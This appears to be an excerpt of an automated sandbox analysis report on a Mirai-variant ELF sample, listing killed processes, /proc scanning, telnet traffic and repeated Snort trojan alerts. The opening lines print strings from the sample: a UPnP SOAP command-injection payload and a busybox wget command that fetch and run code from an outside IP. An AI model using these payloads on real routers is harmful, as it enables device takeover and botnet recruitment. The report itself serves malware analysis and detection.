    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 723, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 764, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 793, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 804, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 850, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 933, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 1431, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 1432, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3047, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3273, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3275, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3278, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3368, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3394, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3456, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3461, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3465, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3469, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 3475, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)SIGKILL sent: pid: 5833, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 723, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 764, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 793, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 804, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 850, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 933, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 1431, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 1432, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 3044, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 3047, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5830, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5836, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5837, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5841, result: successfulJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5843)SIGKILL sent: pid: 5847, result: successfulJump to behavior
    Source: classification engineClassification label: mal92.spre.troj.linELF@0/0@2/0
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1185/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3241/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3483/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1732/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1730/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1333/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1695/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3235/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3234/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/911/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/515/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/5776/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/914/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1617/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/5812/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/5813/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1615/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/917/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/5673/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3255/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3253/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1591/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3252/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3251/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3250/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1623/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1588/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3249/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/764/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3368/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1585/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3246/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3488/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/766/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/800/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/888/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/802/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1509/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/803/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/804/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3800/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3801/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1867/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3802/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1484/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/490/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1514/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1634/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1479/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1875/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/654/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3379/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/655/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/656/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/777/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/931/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1595/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/657/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/812/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/779/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/658/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/933/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/418/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/5833/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/419/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3419/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3310/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3275/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3274/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3273/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3394/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3272/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/782/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3303/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1762/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3027/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1486/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/789/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1806/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3700/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1660/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3440/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/793/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/794/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3316/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/674/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/796/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/675/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/676/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1498/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1497/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1496/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3157/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3278/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3399/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3799/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1659/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3332/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3210/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3298/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3052/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/680/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/681/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/3292/exeJump to behavior
    Source: /tmp/E6l0C6FObI.elf (PID: 5830)File opened: /proc/1701/exeJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43690
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43708
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43710
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43714
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43722
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43726
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43732
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43736
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43740
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 43758
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51112
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51244
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51256
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51278
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51232
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51284
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51414
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51418
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51350
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51466
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51418
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51490
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51534
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51484
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51596
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51626
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51650
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51716
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51740
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51748
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 51770
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58168
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58204
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58220
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58236
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58240
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58256
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58302
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58312
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58312
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58330
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58384
    Source: /tmp/E6l0C6FObI.elf (PID: 5827)Queries kernel information via 'uname': Jump to behavior
    Source: E6l0C6FObI.elf, 5827.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5832.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5833.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5836.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5837.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5841.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5845.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5847.1.00007ffff577f000.00007ffff57a0000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/E6l0C6FObI.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/E6l0C6FObI.elf
    Source: E6l0C6FObI.elf, 5830.1.000055845f381000.000055845f3a2000.rw-.sdmpBinary or memory string: Uu-binfmt/mipsel/usr/bin/qemu-mipsel
    Source: E6l0C6FObI.elf, 5827.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5832.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5833.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5836.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5837.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5841.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5845.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5847.1.000055845f2fa000.000055845f381000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
    Source: E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmpBinary or memory string: U!/usr/bin/qemu-mipsel!AlgorithmIdentifier
    Source: E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
    Source: E6l0C6FObI.elf, 5827.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5832.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5833.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5836.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5837.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5841.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5845.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5847.1.000055845f2fa000.000055845f381000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
    Source: E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmpBinary or memory string: U!/usr/bin/vmtoolsd
    Source: E6l0C6FObI.elf, 5830.1.000055845f381000.000055845f3a2000.rw-.sdmpBinary or memory string: u-binfmt/mipsel/usr/bin/qemu-mipsel
    Source: E6l0C6FObI.elf, 5827.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5830.1.000055845f2fa000.000055845f381000.rw-.sdmp, E6l0C6FObI.elf, 5832.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5833.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5836.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5837.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5841.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5845.1.00007ffff577f000.00007ffff57a0000.rw-.sdmp, E6l0C6FObI.elf, 5847.1.00007ffff577f000.00007ffff57a0000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
